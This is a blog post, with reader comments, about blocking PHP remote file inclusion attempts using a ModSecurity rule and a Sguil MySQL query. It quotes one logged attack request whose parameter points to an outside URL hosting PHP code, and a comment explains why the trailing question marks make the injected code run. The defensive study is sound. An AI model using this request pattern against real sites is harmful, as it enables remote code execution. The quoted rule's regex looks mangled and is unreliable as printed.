Extracting bad url’s from ModSecurity events in Sguil

Running a PHP based blog, I see a lot of attempts to include code hosted elsewhere in requests. A long time ago I added a simple rule to block one type of the these attempts. A typical attempt looks like this:

GET /blog/category/index.php?page=http://www.djrady.ru/includes/conf.txt?? HTTP/1.1

Notice the trailing questionmarks? Turns out these are always present, so very easy to block on. I’m doing that for a long time now, never seen a single false positive. The rule looks like this:

SecRule ARGS:/.*/ “https?.*?$” “msg:’LOCAL PHP ? link code inclusion attempt’,severity:1,phase:1″

This rule looks at all request args, and checks if their value contains http or https and if it ends with a questionmark. If so, the request is blocked.

Today I was thinking that the URI’s that are included probably contain some badness, and it would be interesting to look what all the URI’s are. Using modsec2sguil I’m adding all ModSecurity events to Sguil, so this was going to be an interesting MySQL challenge!

The query I came up with is this:

SELECT COUNT(*) AS cnt, INET_NTOA(src_ip) AS “Source IP”, trim(LEADING “=” FROM substring_index(substr(unhex(data_payload),locate(‘=http’,unhex(data_payload))), ‘?’, 1)) AS url FROM event INNER JOIN data ON event.sid = data.sid and event.cid = data.cid WHERE (timestamp >= ’2009-01-13′ AND signature LIKE “MSc 403 LOCAL PHP ?%”) GROUP BY src_ip,url ORDER BY cnt DESC LIMIT 10;

The result is here (click here for full picture):

Bad uri's from Sguil

I get about 10 url’s like this a day, usually they are tried more than once. So what is at these links? The first one gave a 404, so let’s look at the second one. It’s a jpg, thats a picture right? Wrong!

I downloaded the file and opened it in vim. As you can see in this fragment, this is php code…

Bad uri code

Anyone know if there is some place I can report these url’s to on a daily/weekly basis?

9 thoughts on “Extracting bad url’s from ModSecurity events in Sguil

  1. Pingback: Extracting bad url’s from ModSecurity events in Sguil | PHP-Blog.com

  2. Ofer said – Do you known why does the URL ends with a “?”

    It is a technique somewhat similar to SQL Injection payloads utilizing comment specifiers (– or ;– or #) at the end of their payloads. The RFI attackers do not know what the remainder of the PHP code that they are going to be included into is supposed to do. So, by adding the “?” character, the remainder of the local server PHP code is actually treated as a parameter to the RFI included code. The injected RFI PHP code simply ignores the parameter data so it will only execute its own code.

  3. Thanks for that explanation Ryan. Do you see any danger for false positives when blocking request URI’s ending in a “?”. On my WordPress blog I’ve not seen any FP so far…

  4. I have a question becase i don’t understand:

    SecRule ARGS:/.*/ “https?.*?$” “msg:’LOCAL PHP ? link code inclusion attempt’,severity:1,phase:1″

    As above method, why don’t you use “http?.*?$” instead of “https?.*?$”
    Non-letter “s” and had letter “s”

    @sorry, my english not good

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s